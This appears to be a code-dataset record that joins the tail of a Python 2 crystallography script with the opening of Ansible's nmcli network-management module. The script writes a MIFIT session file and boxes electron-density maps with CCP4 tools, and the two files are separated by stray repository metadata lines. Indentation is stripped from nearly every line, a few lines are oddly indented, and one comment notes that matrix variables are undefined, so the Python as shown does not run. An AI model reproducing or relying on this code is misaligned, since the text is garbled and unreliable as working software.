for eachLine in allLines:
tag = eachLine[0:6]
tag = tag.strip()
if tag == 'ATOM' or tag == 'HETATM':
x = eachLine[30:38]
y = eachLine[38:46]
z = eachLine[46:54]
x = float(x)
y = float(y)
z = float(z)
xmean = x + xmean
ymean = y + ymean
zmean = z + zmean
number_atoms = number_atoms + 1.0
xmean = xmean/number_atoms
ymean = ymean/number_atoms
zmean = zmean/number_atoms
xmean = round(xmean,3)
ymean = round(ymean,3)
zmean = round(zmean,3)
xmean = str(xmean)
ymean = str(ymean)
zmean = str(zmean)
fragcenter_use = ' ' + xmean + ' ' + ymean + ' ' + zmean
else:
fragcenter_use = fragcenter
# Write session file
print 'Session file:',mlw_file
file = open(mlw_file,'w')
file.write('LoadPDB 1 ')
file.write(pdbfile_local)
file.write('\n')
# Standard likelihood weighted map
file.write('MapColumns FO=FWT PHI=PHWT\n')
file.write('LoadMapPhase 1 ')
file.write(mtzout)
file.write('\n')
file.write('silentmode\n')
file.write('coefficients Direct FFT\n')
file.write('fftapply\n')
file.write('maptocont 1\n')
file.write('maplinewidth 1.000000\n')
file.write('contourradius ')
file.write(contourradius)
file.write('\n')
# Write standard or user-defined colors
if first_map == 'no':
file.write('contourlevels 4\n')
file.write('contourleveldefault 50.000000 100.000000 50.000000 200.000000 250.000000\n')
file.write('color 21\n')
file.write('contourcolor 1\n')
file.write('color 22\n')
file.write('contourcolor 2\n')
file.write('color 23\n')
file.write('contourcolor 3\n')
file.write('color 24\n')
file.write('contourcolor 4\n')
file.write('color 25\n')
file.write('contourcolor 5\n')
else:
contourlevels1 = aList_contourlevels1[0]
contourleveldefault1 = aList_contourleveldefault1[0]
aLine = contourleveldefault1.split()
num_contours = len(aLine)
file.write('contourlevels ')
file.write(contourlevels1)
file.write('\n')
file.write('contourleveldefault ')
file.write(contourleveldefault1)
file.write('\n')
count = 0
while count < num_contours:
file.write('color ')
file.write(aList_color1[count])
file.write('\n')
file.write('contourcolor ')
file.write(aList_contourcolor1[count])
file.write('\n')
count = count + 1
file.write('contourmap 1\n')
# Likelihood weighted difference map
file.write('MapColumns FO=DELFWT PHI=PHDELFWT\n')
file.write('LoadMapPhase 2 ')
file.write(mtzout)
file.write('\n')
file.write('silentmode\n')
file.write('coefficients Direct FFT\n')
file.write('fftapply\n')
file.write('maptocont 2\n')
file.write('maplinewidth 1.000000\n')
file.write('contourradius ')
file.write(contourradius)
file.write('\n')
# Write standard or user-defined colors
if second_map == 'no':
file.write('contourlevels 6\n')
file.write('contourleveldefault -200.000000 -150.000000 150.000000 200.000000 250.000000\n')
file.write('color 24\n')
file.write('contourcolor 1\n')
file.write('color 25\n')
file.write('contourcolor 2\n')
file.write('color 21\n')
file.write('contourcolor 3\n')
file.write('color 22\n')
file.write('contourcolor 4\n')
file.write('color 23\n')
file.write('contourcolor 5\n')
else:
contourlevels2 = aList_contourlevels2[0]
contourleveldefault2 = aList_contourleveldefault2[0]
aLine = contourleveldefault2.split()
num_contours = len(aLine)
file.write('contourlevels ')
file.write(contourlevels2)
file.write('\n')
file.write('contourleveldefault ')
file.write(contourleveldefault2)
file.write('\n')
count = 0
while count < num_contours:
file.write('color ')
file.write(aList_color2[count])
file.write('\n')
file.write('contourcolor ')
file.write(aList_contourcolor2[count])
file.write('\n')
count = count + 1
file.write('contourmap 2\n')
# View parameters
file.write('translation ')
file.write(fragcenter_use)
file.write('\nrotation ')
file.write(fragview)
file.write('\n')
file.write('zoom ')
file.write(zoom)
file.write('\n')
file.write('perspective 0.000\n')
file.write('frontclip ')
file.write(frontclip)
file.write('\n')
file.write('backclip ')
file.write(backclip)
file.write('\n')
file.write('transform\n')
file.write('stereo off\n')
file.close()
#
# Option to write map around target point
#
if write_map == 'yes':
mapout_local = mtzout_local.replace('.mtz','_site.map')
# Compute complete map with CCP4/FFT
file = open('mi_fft.inp','w')
file.write('LABIN F1=FWT PHI=PHWT\n')
file.write('END\n')
file.close()
runfft = 'fft HKLIN ' + mtzout_local + ' MAPOUT mi_2ff.map < mi_fft.inp > mi_fft.log'
os.system(runfft)
if not os.path.exists('mi_2ff.map'):
print 'FFT for map display failed'
time.sleep(4)
return 1
else:
os.remove('mi_fft.inp')
os.remove('mi_fft.log')
if fragcenter == 'none':
xyz_limits = 'BORDER ' + str(int(border))
else:
# Obtain box coordinates
xmin_x = x_center - border
xmin_y = y_center
xmin_z = z_center
ymin_x = x_center
ymin_y = y_center - border
ymin_z = z_center
zmin_x = x_center
zmin_y = y_center
zmin_z = z_center - border
xmax_x = x_center + border
xmax_y = y_center
xmax_z = z_center
ymax_x = x_center
ymax_y = y_center + border
ymax_z = z_center
zmax_x = x_center
zmax_y = y_center
zmax_z = z_center + border
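                    # Note: a11..a33 below are the orthogonal-to-fractional conversion matrix elements;
                    # they are not defined in this excerpt and are assumed to come from earlier unit-cell setup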
xmin = a11*xmin_x + a12*xmin_y + a13*xmin_z
ymin = a21*ymin_x + a22*ymin_y + a23*ymin_z
zmin = a31*zmin_x + a32*zmin_y + a33*zmin_z
xmax = a11*xmax_x + a12*xmax_y + a13*xmax_z
ymax = a21*ymax_x + a22*ymax_y + a23*ymax_z
zmax = a31*zmax_x + a32*zmax_y + a33*zmax_z
xmin = round(xmin,4)
ymin = round(ymin,4)
zmin = round(zmin,4)
xmax = round(xmax,4)
ymax = round(ymax,4)
zmax = round(zmax,4)
xmin = str(xmin)
ymin = str(ymin)
zmin = str(zmin)
xmax = str(xmax)
ymax = str(ymax)
zmax = str(zmax)
xyz_limits = 'XYZLIM ' + xmin + ' ' + xmax + ' ' + ymin + ' ' + ymax + ' ' + zmin + ' ' + zmax
# Use CCP4/MAPMASK to box out required region
file = open('mi_mapmask.inp','w')
file.write(xyz_limits)
file.write('\n')
file.write('EXTEND XTAL\n')
file.write('END\n')
file.close()
runmapmask = 'mapmask MAPIN mi_2ff.map XYZIN ' + pdbfile_local + ' MAPOUT ' + mapout_local + ' < mi_mapmask.inp > mi_mapmask.log'
os.system(runmapmask)
if not os.path.exists(mapout_local):
print 'CCP4/MAPMASK for target site failed'
time.sleep(4)
return 1
else:
os.remove('mi_mapmask.inp')
os.remove('mi_mapmask.log')
os.remove('mi_2ff.map')
print 'Map of target region',mapout_local
###################################
# Append content to HTML summary #
###################################
if bngsummary != 'none':
# Learn information from project history
read_ref_summary = 'no'
refine_resolution = '?'
refine_rwork = '?'
refine_rfree = '?'
error_list_path= '?'
project_history_path = os.path.join(workingdir,'project_history.txt')
file = open(project_history_path,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
# Parse for refinement information
if eachLine.find('Job ID:') > -1 and eachLine.find('refine_') > -1:
read_ref_summary = 'yes'
if eachLine.find('Summary:') > -1 and read_ref_summary == 'yes':
refine_summary = eachLine[16:100]
aLine = refine_summary.split()
number_args = len(aLine)
if number_args > 3:
refine_rwork = aLine[0]
refine_rwork = refine_rwork.replace('Rwork=','')
refine_rfree = aLine[1]
refine_rfree = refine_rfree.replace('Rfree=','')
refine_resolution = aLine[3]
refine_resolution = refine_resolution.replace('Resolution=','')
read_ref_summary = 'no'
if eachLine.find('Output error list:') > -1 and read_ref_summary == 'yes':
error_list_path = eachLine[18:200]
error_list_path = error_list_path.strip()
# Setup summary data and links
run_id_link = runcount + 1
run_id_link = str(run_id_link)
filename = bngsummaryfile
file = open(filename,'a')
# Link to history file
file.write('<td><a href = "file:///')
file.write(project_history_path)
file.write('">')
file.write(run_id_link)
file.write('</a></td>\n')
# Resolution
file.write('<td>')
file.write(refine_resolution)
file.write('</td>\n')
# Rw
file.write('<td>')
file.write(refine_rwork)
file.write('</td>\n')
# Rf
file.write('<td>')
file.write(refine_rfree)
file.write('</td>\n')
# Error list link
file.write('<td><a href = "file:///')
file.write(error_list_path)
file.write('">')
file.write(run_id_link)
file.write('</a></td>\n')
# Working directory name and link
file.write('<td><a href = "file:///')
file.write(workingdir)
file.write('">')
file.write(workingdir)
file.write('</a></td></tr>\n')
file.close()
# End of structure solution
# End of loop
runcount = runcount + 1
# Close out HTML summary
if bngsummary != 'none':
runtime = time.ctime(time.time())
filename = bngsummaryfile
file = open(filename,'a')
file.write('</table>')
file.write('<p>\n')
file.write('<b>Job End: ')
file.write(runtime)
file.write('</b><p>\n')
file.write('</body>\n')
file.write('</html>\n')
file.close()
#######################################
# Launch MIFIT option for single runs #
#######################################
if number_datasets == 1 and launch_mifit == 'yes':
os.chdir(workingdir)
print '\nMIFIT LAUNCH'
os.execl(mifitinstall,mlw_file,mlw_file)
#
return 0
if __name__ == "__main__":
sys.exit(Run())
|
gpl-3.0
|
gptech/ansible
|
lib/ansible/modules/net_tools/nmcli.py
|
12
|
41936
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Chris Long <[email protected]> <[email protected]>
#
# This file is a module for Ansible that interacts with Network Manager
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION='''
---
module: nmcli
author: "Chris Long (@alcamie101)"
short_description: Manage Networking
requirements: [ nmcli, dbus, NetworkManager-glib ]
version_added: "2.0"
description:
    - Manage the network devices. Create, modify, and manage ethernet, team, bond and vlan connections.
options:
state:
required: True
choices: [ present, absent ]
description:
- Whether the device should exist or not, taking action if the state is different from what is stated.
autoconnect:
required: False
default: "yes"
choices: [ "yes", "no" ]
description:
- Whether the connection should start on boot.
- Whether the connection profile can be automatically activated
conn_name:
required: True
description:
            - 'Where conn_name will be the name used to call the connection. When not provided, a default name is generated: <type>[-<ifname>][-<num>]'
ifname:
required: False
default: conn_name
description:
            - Where IFNAME will be what we call the interface name.
            - The interface to bind the connection to. The connection will only be applicable to this interface name.
- A special value of "*" can be used for interface-independent connections.
- The ifname argument is mandatory for all connection types except bond, team, bridge and vlan.
type:
required: False
choices: [ ethernet, team, team-slave, bond, bond-slave, bridge, vlan ]
description:
- This is the type of device or network connection that you wish to create.
mode:
required: False
choices: [ "balance-rr", "active-backup", "balance-xor", "broadcast", "802.3ad", "balance-tlb", "balance-alb" ]
        default: balance-rr
description:
            - This is the mode of the connection that you wish to create for a bond, team or bridge.
master:
required: False
default: None
description:
            - The master (ifname, connection UUID or conn_name) of the bridge, team or bond master connection profile.
ip4:
required: False
default: None
description:
- 'The IPv4 address to this interface using this format ie: "192.0.2.24/24"'
gw4:
required: False
description:
- 'The IPv4 gateway for this interface using this format ie: "192.0.2.1"'
dns4:
required: False
default: None
description:
            - 'A list of up to 3 DNS servers, IPv4 format, e.g. to add two IPv4 DNS server addresses: ["192.0.2.53", "198.51.100.53"]'
ip6:
required: False
default: None
description:
- 'The IPv6 address to this interface using this format ie: "abbe::cafe"'
gw6:
required: False
default: None
description:
- 'The IPv6 gateway for this interface using this format ie: "2001:db8::1"'
dns6:
required: False
description:
            - 'A list of up to 3 DNS servers, IPv6 format, e.g. to add two IPv6 DNS server addresses: ["2001:4860:4860::8888", "2001:4860:4860::8844"]'
mtu:
required: False
default: 1500
description:
- The connection MTU, e.g. 9000. This can't be applied when creating the interface and is done once the interface has been created.
- Can be used when modifying Team, VLAN, Ethernet (Future plans to implement wifi, pppoe, infiniband)
primary:
required: False
default: None
description:
            - This is only used with bond and is the primary interface name (for "active-backup" mode); this is usually the 'ifname'.
miimon:
required: False
default: 100
description:
- This is only used with bond - miimon
downdelay:
required: False
default: None
description:
- This is only used with bond - downdelay
updelay:
required: False
default: None
description:
- This is only used with bond - updelay
arp_interval:
required: False
default: None
description:
- This is only used with bond - ARP interval
arp_ip_target:
required: False
default: None
description:
- This is only used with bond - ARP IP target
stp:
required: False
default: None
description:
- This is only used with bridge and controls whether Spanning Tree Protocol (STP) is enabled for this bridge
priority:
required: False
default: 128
description:
- This is only used with 'bridge' - sets STP priority
forwarddelay:
required: False
default: 15
description:
- This is only used with bridge - [forward-delay <2-30>] STP forwarding delay, in seconds
hellotime:
required: False
default: 2
description:
- This is only used with bridge - [hello-time <1-10>] STP hello time, in seconds
maxage:
required: False
default: 20
description:
- This is only used with bridge - [max-age <6-42>] STP maximum message age, in seconds
ageingtime:
required: False
default: 300
description:
- This is only used with bridge - [ageing-time <0-1000000>] the Ethernet MAC address aging time, in seconds
mac:
required: False
default: None
description:
- >
This is only used with bridge - MAC address of the bridge
(note: this requires a recent kernel feature, originally introduced in 3.15 upstream kernel)
slavepriority:
required: False
default: 32
description:
- This is only used with 'bridge-slave' - [<0-63>] - STP priority of this slave
path_cost:
required: False
default: 100
description:
- This is only used with 'bridge-slave' - [<1-65535>] - STP port cost for destinations via this slave
hairpin:
required: False
default: yes
description:
- This is only used with 'bridge-slave' - 'hairpin mode' for the slave, which allows frames to be sent back out through the slave the
frame was received on.
vlanid:
required: False
default: None
description:
- This is only used with VLAN - VLAN ID in range <0-4095>
vlandev:
required: False
default: None
description:
- This is only used with VLAN - parent device this VLAN is on, can use ifname
flags:
required: False
default: None
description:
- This is only used with VLAN - flags
ingress:
required: False
default: None
description:
- This is only used with VLAN - VLAN ingress priority mapping
egress:
required: False
default: None
description:
- This is only used with VLAN - VLAN egress priority mapping
'''
EXAMPLES='''
# These examples are using the following inventory:
#
# ## Directory layout:
#
# |_/inventory/cloud-hosts
# | /group_vars/openstack-stage.yml
# | /host_vars/controller-01.openstack.host.com
# | /host_vars/controller-02.openstack.host.com
# |_/playbook/library/nmcli.py
# | /playbook-add.yml
# | /playbook-del.yml
# ```
#
# ## inventory examples
# ### groups_vars
# ```yml
# ---
# #devops_os_define_network
# storage_gw: "192.0.2.254"
# external_gw: "198.51.100.254"
# tenant_gw: "203.0.113.254"
#
# #Team vars
# nmcli_team:
# - conn_name: tenant
# ip4: '{{ tenant_ip }}'
# gw4: '{{ tenant_gw }}'
# - conn_name: external
# ip4: '{{ external_ip }}'
# gw4: '{{ external_gw }}'
# - conn_name: storage
# ip4: '{{ storage_ip }}'
# gw4: '{{ storage_gw }}'
# nmcli_team_slave:
# - conn_name: em1
# ifname: em1
# master: tenant
# - conn_name: em2
# ifname: em2
# master: tenant
# - conn_name: p2p1
# ifname: p2p1
# master: storage
# - conn_name: p2p2
# ifname: p2p2
# master: external
#
# #bond vars
# nmcli_bond:
# - conn_name: tenant
# ip4: '{{ tenant_ip }}'
# gw4: ''
# mode: balance-rr
# - conn_name: external
# ip4: '{{ external_ip }}'
# gw4: ''
# mode: balance-rr
# - conn_name: storage
# ip4: '{{ storage_ip }}'
# gw4: '{{ storage_gw }}'
# mode: balance-rr
# nmcli_bond_slave:
# - conn_name: em1
# ifname: em1
# master: tenant
# - conn_name: em2
# ifname: em2
# master: tenant
# - conn_name: p2p1
# ifname: p2p1
# master: storage
# - conn_name: p2p2
# ifname: p2p2
# master: external
#
# #ethernet vars
# nmcli_ethernet:
# - conn_name: em1
# ifname: em1
# ip4: '{{ tenant_ip }}'
# gw4: '{{ tenant_gw }}'
# - conn_name: em2
# ifname: em2
# ip4: '{{ tenant_ip1 }}'
# gw4: '{{ tenant_gw }}'
# - conn_name: p2p1
# ifname: p2p1
# ip4: '{{ storage_ip }}'
# gw4: '{{ storage_gw }}'
# - conn_name: p2p2
# ifname: p2p2
# ip4: '{{ external_ip }}'
# gw4: '{{ external_gw }}'
# ```
#
# ### host_vars
# ```yml
# ---
# storage_ip: "192.0.2.91/23"
# external_ip: "198.51.100.23/21"
# tenant_ip: "203.0.113.77/23"
# ```
## playbook-add.yml example
---
- hosts: openstack-stage
remote_user: root
tasks:
- name: install needed network manager libs
yum:
name: '{{ item }}'
state: installed
with_items:
- NetworkManager-glib
- libnm-qt-devel.x86_64
- nm-connection-editor.x86_64
- libsemanage-python
- policycoreutils-python
##### Working with all cloud nodes - Teaming
- name: try nmcli add team - conn_name only & ip4 gw4
nmcli:
type: team
conn_name: '{{ item.conn_name }}'
ip4: '{{ item.ip4 }}'
gw4: '{{ item.gw4 }}'
state: present
with_items:
- '{{ nmcli_team }}'
- name: try nmcli add teams-slave
nmcli:
type: team-slave
conn_name: '{{ item.conn_name }}'
ifname: '{{ item.ifname }}'
master: '{{ item.master }}'
state: present
with_items:
- '{{ nmcli_team_slave }}'
###### Working with all cloud nodes - Bonding
- name: try nmcli add bond - conn_name only & ip4 gw4 mode
nmcli:
type: bond
conn_name: '{{ item.conn_name }}'
ip4: '{{ item.ip4 }}'
gw4: '{{ item.gw4 }}'
mode: '{{ item.mode }}'
state: present
with_items:
- '{{ nmcli_bond }}'
- name: try nmcli add bond-slave
nmcli:
type: bond-slave
conn_name: '{{ item.conn_name }}'
ifname: '{{ item.ifname }}'
master: '{{ item.master }}'
state: present
with_items:
- '{{ nmcli_bond_slave }}'
##### Working with all cloud nodes - Ethernet
- name: nmcli add Ethernet - conn_name only & ip4 gw4
nmcli:
type: ethernet
conn_name: '{{ item.conn_name }}'
ip4: '{{ item.ip4 }}'
gw4: '{{ item.gw4 }}'
state: present
with_items:
- '{{ nmcli_ethernet }}'
## playbook-del.yml example
- hosts: openstack-stage
remote_user: root
tasks:
- name: try nmcli del team - multiple
nmcli:
conn_name: '{{ item.conn_name }}'
state: absent
with_items:
- conn_name: em1
- conn_name: em2
- conn_name: p1p1
- conn_name: p1p2
- conn_name: p2p1
- conn_name: p2p2
- conn_name: tenant
- conn_name: storage
- conn_name: external
- conn_name: team-em1
- conn_name: team-em2
- conn_name: team-p1p1
- conn_name: team-p1p2
- conn_name: team-p2p1
- conn_name: team-p2p2
# To add an Ethernet connection with static IP configuration, issue a command as follows
- nmcli:
conn_name: my-eth1
ifname: eth1
type: ethernet
ip4: 192.0.2.100/24
gw4: 192.0.2.1
state: present
# To add a Team connection with static IP configuration, issue a command as follows
- nmcli:
conn_name: my-team1
ifname: my-team1
type: team
ip4: 192.0.2.100/24
gw4: 192.0.2.1
state: present
autoconnect: yes
# Optionally, at the same time specify IPv6 addresses for the device as follows:
- nmcli:
conn_name: my-eth1
ifname: eth1
type: ethernet
ip4: 192.0.2.100/24
gw4: 192.0.2.1
ip6: '2001:db8::cafe'
gw6: '2001:db8::1'
state: present
# To add two IPv4 DNS server addresses:
- nmcli:
conn_name: my-eth1
dns4:
- 192.0.2.53
- 198.51.100.53
state: present
# To make a profile usable for all compatible Ethernet interfaces, issue a command as follows
- nmcli:
    type: ethernet
    conn_name: my-eth1
ifname: '*'
state: present
# To change the property of a setting e.g. MTU, issue a command as follows:
- nmcli:
conn_name: my-eth1
mtu: 9000
type: ethernet
state: present
# Exit Statuses:
# - nmcli exits with status 0 if it succeeds, a value greater than 0 is
# returned if an error occurs.
# - 0 Success - indicates the operation succeeded
# - 1 Unknown or unspecified error
# - 2 Invalid user input, wrong nmcli invocation
# - 3 Timeout expired (see --wait option)
# - 4 Connection activation failed
# - 5 Connection deactivation failed
# - 6 Disconnecting device failed
# - 7 Connection deletion failed
# - 8 NetworkManager is not running
# - 9 nmcli and NetworkManager versions mismatch
# - 10 Connection, device, or access point does not exist.
'''
# import ansible.module_utils.basic
import os
import sys
HAVE_DBUS=False
try:
import dbus
HAVE_DBUS=True
except ImportError:
pass
HAVE_NM_CLIENT=False
try:
from gi.repository import NetworkManager, NMClient
HAVE_NM_CLIENT=True
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
class Nmcli(object):
"""
This is the generic nmcli manipulation class that is subclassed based on platform.
A subclass may wish to override the following action methods:-
- create_connection()
- delete_connection()
- modify_connection()
- show_connection()
- up_connection()
- down_connection()
All subclasses MUST define platform and distribution (which may be None).
"""
platform='Generic'
distribution=None
if HAVE_DBUS:
bus=dbus.SystemBus()
# The following is going to be used in dbus code
DEVTYPES={1: "Ethernet",
2: "Wi-Fi",
5: "Bluetooth",
6: "OLPC",
7: "WiMAX",
8: "Modem",
9: "InfiniBand",
10: "Bond",
11: "VLAN",
12: "ADSL",
13: "Bridge",
14: "Generic",
15: "Team"
}
STATES={0: "Unknown",
10: "Unmanaged",
20: "Unavailable",
30: "Disconnected",
40: "Prepare",
50: "Config",
60: "Need Auth",
70: "IP Config",
80: "IP Check",
90: "Secondaries",
100: "Activated",
110: "Deactivating",
120: "Failed"
}
def __init__(self, module):
self.module=module
self.state=module.params['state']
self.autoconnect=module.params['autoconnect']
self.conn_name=module.params['conn_name']
self.master=module.params['master']
self.ifname=module.params['ifname']
self.type=module.params['type']
self.ip4=module.params['ip4']
self.gw4=module.params['gw4']
self.dns4=module.params['dns4']
self.ip6=module.params['ip6']
self.gw6=module.params['gw6']
self.dns6=module.params['dns6']
self.mtu=module.params['mtu']
self.stp=module.params['stp']
self.priority=module.params['priority']
self.mode=module.params['mode']
self.miimon=module.params['miimon']
self.downdelay=module.params['downdelay']
self.updelay=module.params['updelay']
self.arp_interval=module.params['arp_interval']
self.arp_ip_target=module.params['arp_ip_target']
self.slavepriority=module.params['slavepriority']
self.forwarddelay=module.params['forwarddelay']
self.hellotime=module.params['hellotime']
self.maxage=module.params['maxage']
self.ageingtime=module.params['ageingtime']
self.mac=module.params['mac']
self.vlanid=module.params['vlanid']
self.vlandev=module.params['vlandev']
self.flags=module.params['flags']
self.ingress=module.params['ingress']
self.egress=module.params['egress']
def execute_command(self, cmd, use_unsafe_shell=False, data=None):
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def merge_secrets(self, proxy, config, setting_name):
try:
# returns a dict of dicts mapping name::setting, where setting is a dict
# mapping key::value. Each member of the 'setting' dict is a secret
secrets=proxy.GetSecrets(setting_name)
# Copy the secrets into our connection config
for setting in secrets:
for key in secrets[setting]:
config[setting_name][key]=secrets[setting][key]
except Exception as e:
pass
def dict_to_string(self, d):
# Try to trivially translate a dictionary's elements into nice string
# formatting.
dstr=""
for key in d:
val=d[key]
str_val=""
add_string=True
if isinstance(val, dbus.Array):
for elt in val:
if isinstance(elt, dbus.Byte):
str_val+="%s " % int(elt)
elif isinstance(elt, dbus.String):
str_val+="%s" % elt
elif isinstance(val, dbus.Dictionary):
dstr+=self.dict_to_string(val)
add_string=False
else:
str_val=val
if add_string:
dstr+="%s: %s\n" % ( key, str_val)
return dstr
def connection_to_string(self, config):
# dump a connection configuration to use in list_connection_info
setting_list=[]
for setting_name in config:
setting_list.append(self.dict_to_string(config[setting_name]))
return setting_list
# print ""
def bool_to_string(self, boolean):
if boolean:
return "yes"
else:
return "no"
def list_connection_info(self):
# Ask the settings service for the list of connections it provides
bus=dbus.SystemBus()
service_name="org.freedesktop.NetworkManager"
proxy=bus.get_object(service_name, "/org/freedesktop/NetworkManager/Settings")
settings=dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
connection_paths=settings.ListConnections()
connection_list=[]
# List each connection's name, UUID, and type
for path in connection_paths:
con_proxy=bus.get_object(service_name, path)
settings_connection=dbus.Interface(con_proxy, "org.freedesktop.NetworkManager.Settings.Connection")
config=settings_connection.GetSettings()
# Now get secrets too; we grab the secrets for each type of connection
# (since there isn't a "get all secrets" call because most of the time
# you only need 'wifi' secrets or '802.1x' secrets, not everything) and
# merge that into the configuration data - To use at a later stage
self.merge_secrets(settings_connection, config, '802-11-wireless')
self.merge_secrets(settings_connection, config, '802-11-wireless-security')
self.merge_secrets(settings_connection, config, '802-1x')
self.merge_secrets(settings_connection, config, 'gsm')
self.merge_secrets(settings_connection, config, 'cdma')
self.merge_secrets(settings_connection, config, 'ppp')
# Get the details of the 'connection' setting
s_con=config['connection']
connection_list.append(s_con['id'])
connection_list.append(s_con['uuid'])
connection_list.append(s_con['type'])
connection_list.append(self.connection_to_string(config))
return connection_list
def connection_exists(self):
# we are going to use name and type in this instance to find if that connection exists and is of type x
connections=self.list_connection_info()
for con_item in connections:
if self.conn_name==con_item:
return True
def down_connection(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# if self.connection_exists():
cmd.append('con')
cmd.append('down')
cmd.append(self.conn_name)
return self.execute_command(cmd)
def up_connection(self):
cmd=[self.module.get_bin_path('nmcli', True)]
cmd.append('con')
cmd.append('up')
cmd.append(self.conn_name)
return self.execute_command(cmd)
def create_connection_team(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating team interface
cmd.append('con')
cmd.append('add')
cmd.append('type')
cmd.append('team')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ip4')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('gw4')
cmd.append(self.gw4)
if self.ip6 is not None:
cmd.append('ip6')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('gw6')
cmd.append(self.gw6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def modify_connection_team(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying team interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ipv4.address')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('ipv4.gateway')
cmd.append(self.gw4)
if self.dns4 is not None:
cmd.append('ipv4.dns')
cmd.append(self.dns4)
if self.ip6 is not None:
cmd.append('ipv6.address')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('ipv6.gateway')
cmd.append(self.gw6)
if self.dns6 is not None:
cmd.append('ipv6.dns')
cmd.append(self.dns6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
# Can't use MTU with team
return cmd
def create_connection_team_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating team-slave interface
cmd.append('connection')
cmd.append('add')
cmd.append('type')
cmd.append(self.type)
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
cmd.append('master')
if self.conn_name is not None:
cmd.append(self.master)
# if self.mtu is not None:
# cmd.append('802-3-ethernet.mtu')
# cmd.append(self.mtu)
return cmd
def modify_connection_team_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying team-slave interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
cmd.append('connection.master')
cmd.append(self.master)
if self.mtu is not None:
cmd.append('802-3-ethernet.mtu')
cmd.append(self.mtu)
return cmd
def create_connection_bond(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating bond interface
cmd.append('con')
cmd.append('add')
cmd.append('type')
cmd.append('bond')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ip4')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('gw4')
cmd.append(self.gw4)
if self.ip6 is not None:
cmd.append('ip6')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('gw6')
cmd.append(self.gw6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
if self.mode is not None:
cmd.append('mode')
cmd.append(self.mode)
if self.miimon is not None:
cmd.append('miimon')
cmd.append(self.miimon)
if self.downdelay is not None:
cmd.append('downdelay')
cmd.append(self.downdelay)
            if self.updelay is not None:
                cmd.append('updelay')
                cmd.append(self.updelay)
            if self.arp_interval is not None:
                cmd.append('arp-interval')
                cmd.append(self.arp_interval)
            if self.arp_ip_target is not None:
                cmd.append('arp-ip-target')
                cmd.append(self.arp_ip_target)
return cmd
def modify_connection_bond(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying bond interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ipv4.address')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('ipv4.gateway')
cmd.append(self.gw4)
if self.dns4 is not None:
cmd.append('ipv4.dns')
cmd.append(self.dns4)
if self.ip6 is not None:
cmd.append('ipv6.address')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('ipv6.gateway')
cmd.append(self.gw6)
if self.dns6 is not None:
cmd.append('ipv6.dns')
cmd.append(self.dns6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def create_connection_bond_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating bond-slave interface
cmd.append('connection')
cmd.append('add')
cmd.append('type')
cmd.append('bond-slave')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
cmd.append('master')
if self.conn_name is not None:
cmd.append(self.master)
return cmd
def modify_connection_bond_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying bond-slave interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
cmd.append('connection.master')
cmd.append(self.master)
return cmd
def create_connection_ethernet(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating ethernet interface
# To add an Ethernet connection with static IP configuration, issue a command as follows
